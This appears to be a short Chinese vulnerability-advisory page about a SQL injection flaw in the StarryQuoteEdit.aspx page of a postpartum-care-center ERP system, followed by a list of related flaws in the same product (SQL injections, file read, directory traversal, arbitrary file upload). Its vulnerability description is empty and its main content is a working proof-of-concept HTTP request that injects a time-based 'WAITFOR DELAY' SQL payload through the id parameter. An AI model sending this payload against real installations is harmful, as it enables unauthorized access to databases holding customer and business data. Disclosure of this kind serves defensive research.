月子会所ERPStarryQuoteEdit.aspx存在sql注入

漏洞描述

PoC代码

GET /Page/SalerManager/StarryQuoteEdit.aspx?id=1;WAITFOR%20DELAY%20%270:0:0%27--+ HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

相关漏洞推荐

• 月子会所ERP /Page/SalerManager/ashx/BindRoomListData.ashx RoomType SQL 注入漏洞
• 月子会所ERP管理云平台 UploadHandler.ashx 文件读取漏洞
• 月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞
• 月子会所ERP管理云平台GetData.ashx接口存在SQL注入漏洞
• 月子会所ERP管理云平台存在目录遍历
• 月子会所ERP管理云平台ModuleUpHandler任意文件上传漏洞
• 月子会所ERP管理云平台存在任意文件上传漏洞
• 月子会所ERP管理云平台存在前台任意文件上传漏洞
• 金同方月子会所ERP UpLoadHandler.ashx文件上传漏洞
• 金同方月子会所ERP BindRoomListData.ashx SQL注入漏洞
• 金同方月子会所ERP YGIsTZ.ashx SQL注入漏洞